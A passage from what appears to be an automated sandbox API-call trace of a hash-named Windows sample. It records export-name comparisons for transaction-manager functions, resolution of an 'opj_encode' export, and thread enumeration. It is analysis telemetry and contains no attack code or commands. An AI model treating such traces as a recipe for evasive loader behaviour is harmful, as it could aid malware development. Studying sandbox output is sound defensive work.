Flags=0x0, Size=0x5e00) returned 0x2db5030 [0236.882] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0236.882] ReadFile (in: hFile=0x17c, lpBuffer=0x2db5030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2db5030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0236.883] CloseHandle (hObject=0x17c) returned 1 [0236.883] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0236.883] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0236.883] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0236.883] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0236.884] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0236.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0236.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0236.884] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0236.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0236.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0236.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0236.884] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0236.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0236.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0236.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0236.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0236.884] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0236.884] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0236.884] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0236.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0236.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0236.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0236.885] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0236.885] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0236.885] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0236.885] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0236.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0236.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0236.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0236.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0236.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0236.886] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.886] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0236.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0236.887] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0236.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0236.887] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0236.888] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0236.888] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0236.889] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0236.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0236.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0236.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0236.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0236.889] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0236.890] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0236.890] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0236.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0236.891] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0236.892] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0236.892] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0236.893] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0236.893] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0236.893] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0236.893] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0236.893] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0236.893] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0236.893] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenResourceManager") returned 1 [0236.894] GetProcessHeap () returned 0x560000 [0236.894] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x560000) returned 1 [0236.899] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameW") returned 0x7ffc5ecf4840 [0236.899] GetModuleFileNameW (in: hModule=0x7ffc45e90000, lpFilename=0x180013b88, nSize=0x104 | out: lpFilename="C:\\Users\\RDHJ0C~1\\Desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\8b971c2c4c9a020eb274c36db20bc0e1b203a7909d63f48f99bef5594110929f.exe.dll")) returned 0x62 [0236.900] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x1000) returned 0x2db5030 [0236.900] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x16) returned 0x5790f0 [0236.900] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="opj_encode", cchWideChar=-1, lpMultiByteStr=0x5790f0, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="opj_encode", lpUsedDefaultChar=0x0) returned 11 [0236.900] GetLastError () returned 0x0 [0236.900] SetLastError (dwErrCode=0x0) [0236.901] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_encodeW") returned 0x0 [0236.901] GetLastError () returned 0x7f [0236.901] SetLastError (dwErrCode=0x7f) [0236.901] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_encodeA") returned 0x0 [0236.901] GetProcAddress (hModule=0x7ffc45e90000, lpProcName="opj_encode") returned 0x7ffc45f1a760 [0236.901] GetActiveWindow () returned 0x0 [0236.901] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x2db5030 | out: hHeap=0x560000) returned 1 [0236.901] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x5790f0 | out: hHeap=0x560000) returned 1 [0236.901] GetCurrentProcessId () returned 0xdc4 [0236.901] GetCurrentThreadId () returned 0xf44 [0236.901] CreateToolhelp32Snapshot (dwFlags=0x4, th32ProcessID=0x0) returned 0x17c [0237.132] Thread32First (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.132] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.133] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.134] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.135] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.136] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.137] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.138] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.139] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.140] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.141] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.142] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.143] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.144] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.145] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.146] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.147] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.148] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.149] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.150] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.151] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.152] Thread32Next (hSnapshot=0x17c, lpte=0x14fe78) returned 1 [0237.153] Thread32Next 